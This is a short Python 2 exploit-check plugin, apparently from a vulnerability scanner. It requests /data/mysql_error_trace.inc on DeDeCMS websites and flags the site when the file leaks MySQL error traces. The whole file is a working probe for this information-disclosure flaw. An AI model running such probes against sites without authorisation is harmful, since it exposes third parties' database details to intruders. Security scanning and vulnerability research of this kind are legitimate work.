#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date:   2016-09-20 15:34:41
# @Last Modified by:   Lcy
# @Last Modified time: 2016-09-21 10:41:04
import urllib2
class Exploit:
    def __init__(self,target,expfile):
        self.target = target
        self.result = {
            "name": "DeDeCMS data/mysql_error_trace.inc 信息泄露",
            "author": "Lcy",
            "type": "website",
            "ref": "https://phpinfo.me",
            "status":False,
            "info":"",
            'filename':expfile + ".py",
            "target":target,
        }
    def verify(self):
        file_path = "/data/mysql_error_trace.inc"
        try:
            file_url = self.target+file_path
            req = urllib2.Request(file_url)
            res = urllib2.urlopen(req,timeout=3)
            file_content = res.read()
            if "exit" in file_content:
                self.result['status'] = True
                self.result["info"] = "目标 {url} 存在敏感信息泄露 验证url:{verify_url}".format(
                    url = self.target,
                    verify_url=file_url
                    )
        except Exception,e :
            pass
       